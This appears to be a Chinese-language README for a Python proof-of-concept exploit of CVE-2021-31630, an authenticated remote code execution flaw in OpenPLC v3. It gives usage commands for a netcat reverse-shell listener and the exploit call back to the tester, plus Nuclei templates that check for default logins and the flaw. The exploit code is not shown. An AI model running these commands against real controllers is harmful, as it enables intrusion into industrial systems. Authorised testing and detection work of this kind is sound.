
Python 3.13+ 概念验证漏洞利用,针对 CVE-2021-31630,通过恶意硬件层上传实现 OpenPLC v3 的已认证远程代码执行。包含用于默认凭据和漏洞检查的 Nuclei 检测模板。
这是一个现代 Python 3.13+ 兼容的概念验证漏洞利用程序,用于 CVE-2021-31630,该漏洞存在于 OpenPLC v3 中,允许认证用户上传包含恶意代码的自定义硬件层,从而导致在主机上远程执行代码(RCE)。
原始漏洞发现和报告由 Fellipe Oliveira 提供。 此重新实现和现代化版本使用 httpx、CLI 工具、日志记录和更安全的检测技术。
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
可选参数:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
第二个模板会登录并尝试无害的有效载荷上传+编译,以确认可能存在的漏洞——而不会触发实际的代码执行。
此代码仅供教育和授权的安全测试使用。 未经系统所有者明确许可,不得使用。